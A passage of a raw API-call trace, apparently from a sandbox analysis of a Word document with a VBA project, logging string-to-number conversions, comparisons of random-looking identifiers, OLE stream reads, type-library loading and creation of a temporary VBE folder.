pfltOut=0x40d83221 | out: pfltOut=0x40d83221) returned 0x0 [0059.697] VarR8FromStr (in: strIn="24776.529820995", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.697] VarR4FromR8 (in: dblIn=0xe8965191, pfltOut=0x40d83221 | out: pfltOut=0x40d83221) returned 0x0 [0059.697] VarI4FromStr (in: strIn="30893", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.697] VarR8FromStr (in: strIn="14648.97503612", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.697] VarR4FromR8 (in: dblIn=0xcdfbcbe9, pfltOut=0x40cc9c7c | out: pfltOut=0x40cc9c7c) returned 0x0 [0059.697] VarR8FromStr (in: strIn="14648.97503612", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.697] VarR4FromR8 (in: dblIn=0xcdfbcbe9, pfltOut=0x40cc9c7c | out: pfltOut=0x40cc9c7c) returned 0x0 [0059.697] VarI4FromStr (in: strIn="11458", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.697] VarR8FromStr (in: strIn="53477.083871837", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.697] VarR4FromR8 (in: dblIn=0xaf13fd9f, pfltOut=0x40ea1ca2 | out: pfltOut=0x40ea1ca2) returned 0x0 [0059.697] VarR8FromStr (in: strIn="53477.083871837", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.697] VarR4FromR8 (in: dblIn=0xaf13fd9f, pfltOut=0x40ea1ca2 | out: pfltOut=0x40ea1ca2) returned 0x0 [0059.698] VarR8FromStr (in: strIn="42846.176005626", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.698] VarR4FromR8 (in: dblIn=0xa1d68cf3, pfltOut=0x40e4ebc5 | out: pfltOut=0x40e4ebc5) returned 0x0 [0059.698] VarR8FromStr (in: strIn="56694.261919318", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.698] VarR4FromR8 (in: dblIn=0x61a49f20, pfltOut=0x40ebaec8 | out: pfltOut=0x40ebaec8) returned 0x0 [0059.698] VarR8FromStr (in: strIn="56694.261919318", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.698] VarR4FromR8 (in: dblIn=0x61a49f20, pfltOut=0x40ebaec8 | out: pfltOut=0x40ebaec8) returned 0x0 [0059.698] CExposedStream::Read () returned 0x0 [0059.698] CExposedStream::Read () returned 0x0 [0059.698] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="LUHmfEit", cchCount1=-1, lpString2="oMAQfY", cchCount2=-1) returned 1 [0059.698] VarI4FromStr (in: strIn="32677", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.698] VarI4FromStr (in: strIn="14586", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.698] VarR8FromStr (in: strIn="28362.301039552", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.699] VarR4FromR8 (in: dblIn=0x443b65a9, pfltOut=0x40dbb293 | out: pfltOut=0x40dbb293) returned 0x0 [0059.699] VarR8FromStr (in: strIn="31868.978492144", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.699] VarR4FromR8 (in: dblIn=0x9f9d8378, pfltOut=0x40df1f3e | out: pfltOut=0x40df1f3e) returned 0x0 [0059.699] VarI4FromStr (in: strIn="14586", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.699] VarI4FromStr (in: strIn="17536", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.699] VarR8FromStr (in: strIn="58969.331025765", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.699] VarR4FromR8 (in: dblIn=0x97c3585a, pfltOut=0x40eccb2a | out: pfltOut=0x40eccb2a) returned 0x0 [0059.699] VarR8FromStr (in: strIn="49206.680442277", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.699] VarR4FromR8 (in: dblIn=0xc62ee1d1, pfltOut=0x40e806d5 | out: pfltOut=0x40e806d5) returned 0x0 [0059.699] VarI4FromStr (in: strIn="14586", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.699] VarI4FromStr (in: strIn="10416", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.699] VarI4FromStr (in: strIn="17536", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.700] VarI4FromStr (in: strIn="10416", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.700] VarI4FromStr (in: strIn="24125", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.700] VarI4FromStr (in: strIn="1661713018", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.700] VarR8FromStr (in: strIn="46334.364054785", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.700] VarR4FromR8 (in: dblIn=0xa6563871, pfltOut=0x40e69fcb | out: pfltOut=0x40e69fcb) returned 0x0 [0059.700] VarI4FromStr (in: strIn="24125", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.700] VarR8FromStr (in: strIn="20081.968453916", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.700] VarR4FromR8 (in: dblIn=0xfb26223a, pfltOut=0x40d39c7d | out: pfltOut=0x40d39c7d) returned 0x0 [0059.700] VarR8FromStr (in: strIn="20081.968453916", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.700] VarR4FromR8 (in: dblIn=0xfb26223a, pfltOut=0x40d39c7d | out: pfltOut=0x40d39c7d) returned 0x0 [0059.700] VarI4FromStr (in: strIn="10150", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.701] VarR8FromStr (in: strIn="5799.7712631015", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.701] VarR4FromR8 (in: dblIn=0x717fa58e, pfltOut=0x40b6a7c5 | out: pfltOut=0x40b6a7c5) returned 0x0 [0059.701] VarI4FromStr (in: strIn="21465", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.701] VarR8FromStr (in: strIn="57198.241364403", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.701] VarR4FromR8 (in: dblIn=0xb941d72a, pfltOut=0x40ebedc7 | out: pfltOut=0x40ebedc7) returned 0x0 [0059.701] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="EVYnkU", cchCount1=-1, lpString2="XFSyEc1", cchCount2=-1) returned 1 [0059.701] VarI4FromStr (in: strIn="1047607516", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.704] VarR8FromStr (in: strIn="50489.039937998", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.704] VarR4FromR8 (in: dblIn=0x472c0d69, pfltOut=0x40e8a721 | out: pfltOut=0x40e8a721) returned 0x0 [0059.704] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Z9EGQerHI", cchCount1=-1, lpString2="kD6Tqo", cchCount2=-1) returned 3 [0059.704] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Z9EGQerHI", cchCount1=-1, lpString2="kD6Tqo", cchCount2=-1) returned 3 [0059.704] VarR8FromStr (in: strIn="45218.512612452", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.704] VarR4FromR8 (in: dblIn=0x67523a9c, pfltOut=0x40e61450 | out: pfltOut=0x40e61450) returned 0x0 [0059.704] VarI4FromStr (in: strIn="22729", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.704] VarI4FromStr (in: strIn="27612", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.705] VarR8FromStr (in: strIn="59222.183222964", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.705] VarR4FromR8 (in: dblIn=0xdcf667c8, pfltOut=0x40eceac5 | out: pfltOut=0x40eceac5) returned 0x0 [0059.705] VarI4FromStr (in: strIn="14896", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.705] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="a7qOyZ0li", cchCount1=-1, lpString2="TQ3MDclPq", cchCount2=-1) returned 1 [0059.705] VarI4FromStr (in: strIn="22729", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.705] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="a7qOyZ0li", cchCount1=-1, lpString2="TQ3MDclPq", cchCount2=-1) returned 1 [0059.705] VarR8FromStr (in: strIn="7152.7906627728", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.705] VarR4FromR8 (in: dblIn=0x68e01f57, pfltOut=0x40bbf0ca | out: pfltOut=0x40bbf0ca) returned 0x0 [0059.705] VarR8FromStr (in: strIn="20705.78112622", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.705] VarR4FromR8 (in: dblIn=0xfdf8d43d, pfltOut=0x40d43871 | out: pfltOut=0x40d43871) returned 0x0 [0059.705] VarI4FromStr (in: strIn="27612", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.706] VarI4FromStr (in: strIn="22729", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.706] VarI4FromStr (in: strIn="792882462", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.706] VarI4FromStr (in: strIn="792882462", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.706] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="SoaVB2jX", cchCount1=-1, lpString2="sPJK3B8EW", cchCount2=-1) returned 1 [0059.706] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="SoaVB2jX", cchCount1=-1, lpString2="sPJK3B8EW", cchCount2=-1) returned 1 [0059.706] VarR8FromStr (in: strIn="15777.286066505", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.706] VarR4FromR8 (in: dblIn=0x9dd3c5ba, pfltOut=0x40ced0a4 | out: pfltOut=0x40ced0a4) returned 0x0 [0059.706] VarI4FromStr (in: strIn="582892296", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.706] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="BvM2SJojd" | out: _Dst="BvM2SJojd") returned 0x0 [0059.707] VarI4FromStr (in: strIn="21109", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.707] VarI4FromStr (in: strIn="21109", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.707] CExposedStream::Read () returned 0x0 [0059.707] CRetailMalloc_Realloc () returned 0x888ca48 [0059.707] CExposedStream::Release () returned 0x1 [0059.707] CExposedStream::Release () returned 0x0 [0059.707] CExposedStream::Release () returned 0x0 [0059.707] CRetailMalloc_Free () returned 0x1 [0059.707] CRetailMalloc_Free () returned 0x1 [0059.707] CRetailMalloc_Free () returned 0x1 [0059.707] CRetailMalloc_Free () returned 0x1 [0059.707] CExposedStream::Seek () returned 0x80030102 [0059.707] CRetailMalloc_Free () returned 0x1 [0059.708] lstrcpyA (in: lpString1=0x6d03740, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0059.708] CExposedDocFile::Stat () returned 0x0 [0059.708] CExposedDocFile::OpenStream () returned 0x0 [0059.708] CExposedDocFile::AddRef () returned 0x3 [0059.708] CExposedStream::Stat () returned 0x0 [0059.708] CExposedStream::Read () returned 0x0 [0059.713] CExposedDocFile::OpenStream () returned 0x0 [0059.713] CExposedStream::Stat () returned 0x0 [0059.713] CExposedStream::Read () returned 0x0 [0059.713] CExposedStream::Release () returned 0x0 [0059.713] lstrcpyA (in: lpString1=0x6d03b70, lpString2="" | out: lpString1="") returned="" [0059.714] lstrcmpiA (lpString1="ThisDocument", lpString2="ThisDocument") returned 0 [0059.714] lstrlenA (lpString="ThisDocument") returned 12 [0059.714] lstrcpyA (in: lpString1=0x6d03bc8, lpString2="" | out: lpString1="") returned="" [0059.714] lstrcmpiA (lpString1="B3BemS4", lpString2="B3BemS4") returned 0 [0059.714] lstrlenA (lpString="B3BemS4") returned 7 [0059.714] lstrcpyA (in: lpString1=0x6d03c20, lpString2="" | out: lpString1="") returned="" [0059.715] lstrcmpiA (lpString1="gR4WCf", lpString2="gR4WCf") returned 0 [0059.717] lstrlenA (lpString="gR4WCf") returned 6 [0059.717] lstrcpyA (in: lpString1=0x6d0e4e0, lpString2="" | out: lpString1="") returned="" [0059.717] lstrcmpiA (lpString1="xZvX7", lpString2="xZvX7") returned 0 [0059.717] lstrlenA (lpString="xZvX7") returned 5 [0059.717] lstrcpyA (in: lpString1=0x6d0e538, lpString2="" | out: lpString1="") returned="" [0059.717] lstrcmpiA (lpString1="SDWYuI6", lpString2="SDWYuI6") returned 0 [0059.717] lstrlenA (lpString="SDWYuI6") returned 7 [0059.718] atoi (_Str="393222000") returned 393222000 [0059.718] lstrcpynA (in: lpString1=0x6d02ca8, lpString2="{AD26559F-C670-4C50-9873-DA81D6256255}", iMaxLength=39 | out: lpString1="{AD26559F-C670-4C50-9873-DA81D6256255}") returned="{AD26559F-C670-4C50-9873-DA81D6256255}" [0059.718] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{AD26559F-C670-4C50-9873-DA81D6256255}") returned -1 [0059.718] lstrlenA (lpString="{AD26559F-C670-4C50-9873-DA81D6256255}") returned 38 [0059.718] lstrlenA (lpString="{AD26559F-C670-4C50-9873-DA81D6256255}") returned 38 [0059.718] lstrlenA (lpString="{AD26559F-C670-4C50-9873-DA81D6256255}") returned 38 [0059.719] CExposedStream::Commit () returned 0x0 [0059.719] CExposedStream::Release () returned 0x0 [0059.719] lstrlenA (lpString="&H00000001") returned 10 [0059.720] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0059.720] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0059.720] CLSIDFromString (in: lpsz="{3832D640-CF90-11CF-8E43-00A0C911005A}", pclsid=0x6d0ef18 | out: pclsid=0x6d0ef18*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a))) returned 0x0 [0059.722] CRetailMalloc_Alloc () returned 0x88115a0 [0059.748] CExposedDocFile::CreateStorage () returned 0x0 [0059.748] CRetailMalloc_Alloc () returned 0x884fa18 [0059.749] CRetailMalloc_Realloc () returned 0x87cc298 [0059.749] CRetailMalloc_Alloc () returned 0x867bba8 [0059.749] CRetailMalloc_Alloc () returned 0x76df350 [0059.749] CRetailMalloc_Alloc () returned 0x887e078 [0059.749] CRetailMalloc_Realloc () returned 0x86effe8 [0059.749] CRetailMalloc_Alloc () returned 0x87cecd8 [0059.749] CRetailMalloc_Alloc () returned 0x87ce438 [0059.749] CRetailMalloc_Alloc () returned 0x8811550 [0059.749] CRetailMalloc_Alloc () returned 0x87fc1d0 [0059.750] CRetailMalloc_Alloc () returned 0x87ebc98 [0059.750] CRetailMalloc_Alloc () returned 0x86e60b8 [0059.750] CRetailMalloc_Alloc () returned 0x87ebda8 [0059.750] CRetailMalloc_Alloc () returned 0x88115f0 [0059.750] CRetailMalloc_Alloc () returned 0x87ebe30 [0059.750] CRetailMalloc_Realloc () returned 0x887e298 [0059.750] CRetailMalloc_Alloc () returned 0x86e60c8 [0059.750] CRetailMalloc_Alloc () returned 0x86e60d8 [0059.750] CRetailMalloc_Alloc () returned 0x888f048 [0059.750] CRetailMalloc_Free () returned 0x1 [0059.750] CRetailMalloc_Realloc () returned 0x874a4a0 [0059.769] CRetailMalloc_Realloc () returned 0x884fc70 [0059.769] SysStringLen (param_1="Word") returned 0x4 [0059.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0059.769] SysStringLen (param_1="Word") returned 0x4 [0059.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x87fc354, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0059.770] CRetailMalloc_Alloc () returned 0x8680ba0 [0059.770] CRetailMalloc_Free () returned 0x1610001 [0059.771] CRetailMalloc_Realloc () returned 0x88a0408 [0059.771] SysStringLen (param_1="VBA") returned 0x3 [0059.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0059.771] SysStringLen (param_1="VBA") returned 0x3 [0059.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x87fc354, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0059.771] CRetailMalloc_Alloc () returned 0x87fc4e8 [0059.771] CRetailMalloc_Free () returned 0x35e0501 [0059.771] CRetailMalloc_Alloc () returned 0x88115f0 [0059.772] CRetailMalloc_Free () returned 0x51e0301 [0059.772] CRetailMalloc_Alloc () returned 0x8680ba0 [0059.772] CRetailMalloc_Free () returned 0x1610001 [0059.772] CRetailMalloc_Free () returned 0x3c00201 [0059.772] CRetailMalloc_Alloc () returned 0x87501a0 [0059.772] CRetailMalloc_Alloc () returned 0x87fc4e8 [0059.773] CRetailMalloc_Free () returned 0x3be0201 [0059.773] CRetailMalloc_Free () returned 0x3ba0201 [0059.773] CRetailMalloc_Realloc () returned 0x86e60f8 [0059.773] CRetailMalloc_Realloc () returned 0x87cf128 [0059.773] LoadStringA (in: hInstance=0x74cf0000, uID=0x32f3, lpBuffer=0x6d039f4, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0059.775] wsprintfA (in: param_1=0x6d039fb, param_2="%d" | out: param_1="1") returned 1 [0059.777] lstrcmpiA (lpString1="Project", lpString2="Project1") returned -1 [0059.777] CRetailMalloc_Free () returned 0x3db0501 [0059.777] CRetailMalloc_Alloc () returned 0x88115f0 [0059.778] CRetailMalloc_Realloc () returned 0x880dde0 [0059.778] CRetailMalloc_Free () returned 0xc8e0401 [0059.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SysWOW64\\stdole2.tlb", cchWideChar=-1, lpMultiByteStr=0x348380, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SysWOW64\\stdole2.tlb", lpUsedDefaultChar=0x0) returned 32 [0059.785] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\stdole2.tlb", pptlib=0x34871c*=0x0 | out: pptlib=0x34871c*=0x87ceab0) returned 0x0 [0059.785] IUnknown:QueryInterface (in: This=0x87ceab0, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x3483e8 | out: ppvObject=0x3483e8*=0x0) returned 0x80004002 [0059.787] CRetailMalloc_Realloc () returned 0x88a0b80 [0059.787] SysStringLen (param_1="stdole") returned 0x6 [0059.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0059.787] SysStringLen (param_1="stdole") returned 0x6 [0059.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x87fc354, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0059.787] CRetailMalloc_Alloc () returned 0x86bad40 [0059.787] CRetailMalloc_Free () returned 0xde0001 [0059.787] CRetailMalloc_Alloc () returned 0x8811488 [0059.787] CRetailMalloc_Realloc () returned 0x88421d0 [0059.787] CRetailMalloc_Free () returned 0x69e0001 [0059.788] CRetailMalloc_Alloc () returned 0x87cc360 [0059.788] CRetailMalloc_Free () returned 0x1790001 [0059.788] CRetailMalloc_Alloc () returned 0x87cc360 [0059.788] CRetailMalloc_Free () returned 0x1790001 [0059.788] IUnknown:Release (This=0x87ceab0) returned 0x4 [0059.796] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x3484a8 | out: lpBuffer="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\") returned 0x25 [0059.796] _access (_FileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\", _AccessMode=0) returned 0 [0059.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x348480, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0059.797] _msize (_Block=0x6d03c00) returned 0x26 [0059.798] _msize (_Block=0x9fc0c78) returned 0x26 [0059.798] strcpy_s (in: _Dst=0x9fc0c78, _DstSize=0x29, _Src="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.798] _access_s (_FileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x2 [0059.798] strcpy_s (in: _Dst=0x9fc0c78, _DstSize=0x29, _Src="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.798] _mkdir (_Path="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE") returned 0 [0059.799] strcpy_s (in: _Dst=0x9fc0c78, _DstSize=0x29, _Src="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.799] strcpy_s (in: _Dst=0x9fc0c78, _DstSize=0x29, _Src="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.799] strcpy_s (in: _Dst=0x9fc0c78, _DstSize=0x29, _Src="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0059.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE", cchWideChar=-1, lpMultiByteStr=0x348660, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE", lpUsedDefaultChar=0x0) returned 41 [0059.800] _access_s (_FileName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0059.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", cchWideChar=-1, lpMultiByteStr=0x86bad40, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", lpUsedDefaultChar=0x0) returned 39 [0059.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x3486a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0059.800] lstrlenA (lpString="VBE") returned 3 [0059.800] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0059.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x348690, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0059.800] wsprintfA (in: param_1=0x6d03c00, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0059.800] wsprintfA (in: param_1=0x3486cc, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0059.802] CRetailMalloc_Free () returned 0x69e0001 [0059.802] CRetailMalloc_Alloc () returned 0x88114d8 [0059.803] IsCharAlphaA (ch=78) returned 1 [0059.804] lstrlenA (lpString="Normal") returned 6 [0059.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x348518, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.804] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0059.804] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0059.805] CRetailMalloc_Free () returned 0x1a40101 [0059.805] CRetailMalloc_Alloc () returned 0x8811690 [0059.805] CRetailMalloc_Realloc () returned 0x88421d0 [0059.805] CRetailMalloc_Free () returned 0x6920101 [0059.808] wcscpy_s (in: _Destination=0x3481ee, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0059.809] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z065b40e112") returned -23 [0059.809] IUnknown:QueryInterface (in: This=0x87ce888, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347f58 | out: ppvObject=0x347f58*=0x0) returned 0x80004002 [0059.809] IUnknown:Release (This=0x87ce888) returned 0x3 [0059.809] IUnknown:QueryInterface (in: This=0x87ce660, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x347f58 | out: ppvObject=0x347f58*=0x0) returned 0x80004002 [0059.809] IUnknown:Release (This=0x87ce660) returned 0x4 [0059.809] IUnknown:QueryInterface (in: This=0x87ceab0, riid=0x7503ca84*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, 